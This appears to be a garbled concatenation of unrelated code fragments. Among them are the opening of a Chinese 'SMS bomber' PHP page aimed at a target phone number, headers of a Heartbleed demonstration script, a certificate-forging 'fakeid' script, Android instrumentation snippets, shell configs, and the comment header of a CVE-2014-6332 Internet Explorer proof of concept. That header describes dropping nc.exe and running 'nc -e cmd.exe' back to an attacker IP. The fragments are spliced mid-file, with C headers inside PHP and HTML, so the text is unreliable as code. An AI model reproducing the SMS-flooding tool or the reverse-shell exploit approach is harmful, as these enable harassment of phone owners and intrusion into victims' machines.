
<?php
// Target phone number, copied verbatim from the ?hm= query parameter; no
// format, length or allow-list check is applied before it is used below.
$tel_no = $_GET['hm'];
// Request counter from ?c=; $_GET['c'] is read without isset(), so a missing
// parameter raises an undefined-index notice, and the value is not cast to
// int before the increment.
$c = $_GET['c']?$_GET['c']:0;
$c++;
?>
<!DOCTYPE html>
<html>
<head>
<title>迷你轰炸台 - 短信炸弹 - BETA!</title>
<?php
#include <sched.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <signal.h>
/* S */
int nuke_cpu(void)
python sslfun
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
ddi SmsManager hook test
/*
* Collin's Dynamic Dalvik Instrumentation Toolkit for Android
* Collin Mulliner <collin[at]mulliner.org>
*
* (c) 2012,2013
*
* License: LGPL v2.1
*
*/
# Where oh-my-zsh is installed; exported so child processes see it too.
ZSH="$HOME/.oh-my-zsh"
export ZSH
# Theme to load, chosen by name from ~/.oh-my-zsh/themes/.
# The special value "random" picks a different theme on every oh-my-zsh start.
ZSH_THEME=ys
# Example aliases
Patch on mksh to enable shell command logging into logcat. Remember to replace ash with mksh on emulator builds.
diff --git a/Android.mk b/Android.mk
index e53b863..1d3854e 100644
--- a/Android.mk
+++ b/Android.mk
@@ -8,7 +8,6 @@ LOCAL_PATH:= $(call my-dir)
# /system/etc/mkshrc
include $(CLEAR_VARS)
-
LOCAL_MODULE:= mkshrc
ddi class dump
I/dalvikvm( 705): Ljava/lang/Long;
I/dalvikvm( 705): Landroid/graphics/LightingColorFilter;
I/dalvikvm( 705): Landroid/os/StrictMode$LogStackTrace;
I/dalvikvm( 705): Landroid/net/Uri$Part;
I/dalvikvm( 705): Lcom/android/internal/app/AlertController$ButtonHandler;
I/dalvikvm( 705): Landroid/widget/QuickContactBadge$QueryHandler;
I/dalvikvm( 705): Ljava/security/KeyFactorySpi;
I/dalvikvm( 705): Landroid/util/StateSet;
I/dalvikvm( 705): Lcom/android/org/bouncycastle/asn1/x509/AlgorithmIdentifier;
I/dalvikvm( 705): Ljava/util/concurrent/Executors$DefaultThreadFactory;
fakeid CA script from BH presentation
import OpenSSL
from OpenSSL.crypto import *
#assume you've already generated client.cer
#extract CERT.RSA
#openssl pkcs7 -in CERT.RSA -print_certs -inform DER -out cert.cer : CA cert isolated from RSA
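# Load the CA certificate isolated from CERT.RSA (see the openssl command
# above). The context manager closes the file handle, which the original
# bare open(...).read() left to the garbage collector.
with open('cert.cer', 'r') as cert_file:
    cacert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert_file.read())
# Fresh RSA key pair for the certificate built further down in the script.
# NOTE(review): 1024-bit RSA is below current minimum recommendations (2048+);
# kept as in the original, presumably to match the existing chain -- confirm.
pk = OpenSSL.crypto.PKey()
pk.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)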
import org.sireum.util._
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.alir.reachingFactsAnalysis.AndroidReachingFactsAnalysisConfig
import org.sireum.jawa.util.Timer
import org.sireum.amandroid.security.apiMisuse.InterestingApiCollector
import org.sireum.jawa.MessageCenter._
import org.sireum.amandroid.util.AndroidLibraryAPISummary
import org.sireum.amandroid.AppCenter
import org.sireum.jawa.alir.reachability.ReachabilityAnalysis
import org.sireum.jawa.JawaCodeSource
<html>
<head>
<!--
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell
The PoC drops nc.exe, then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)